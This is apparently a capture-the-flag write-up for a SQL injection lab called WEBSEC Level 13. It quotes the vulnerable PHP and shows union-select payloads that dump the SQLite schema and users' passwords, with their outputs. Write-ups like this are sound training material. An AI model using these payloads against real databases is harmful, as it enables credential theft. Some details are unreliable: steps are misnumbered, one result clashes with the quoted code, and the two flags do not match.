WEBSEC Level 13

Challenge description

Yet an other sqli challenge, or is it? Yes it is. Or… is it?

Initial analysis

tmp = explode(ʹ, ʹ, _GET['ids']); for (i = 0; i < count(tmp); i++ ) { tmp[i] = (int)tmp[i]; if( tmp[i] < 1 ) { unset(tmp[i]); } }


selector = implode(ʹ, ʹ, array_unique(tmp));

$query = "SELECT user_id, user_privileges, user_name FROM users WHERE (user_id in (" . $selector . "));";

Walk through

STEP 1: Payload: 1,2,3 OUTPUT: User user_36 with id 1 has no privileges. User user_13 with id 2 has no privileges. User user_99 with id 3 has no privileges.

STEP 2: Payload: 0,0,0 OUTPUT: User admin with id 0 has all privileges.

STEP 3: Payload: ",,,)) union select 1,2, sql as user_id from sqlite_master-- OUTPUT: User CREATE TABLE users ( user_id INTEGER PRIMARY KEY, user_name TEXT NOT NULL, user_privileges INTEGER NOT NULL, user_password TEXT NOT NULL ) with id 1 has no privileges.

STEP 3: Payload: ",,,)) union select 1,2,user_password as user_id from users-- OUTPUT: User WEBSEC{SQL_injection_in_your_cms,madesimple} with id 1 has no privileges.

Flag

FLAG: WEBSEC{SQL_injection_in_your_cms,_made_simple}

For further queries, please DM me on Twitter: https://twitter.com/gopika-subramanian.

WEBSEC Level 13

Challenge description

Initial analysis

Walk through

Flag

OTHER POSTS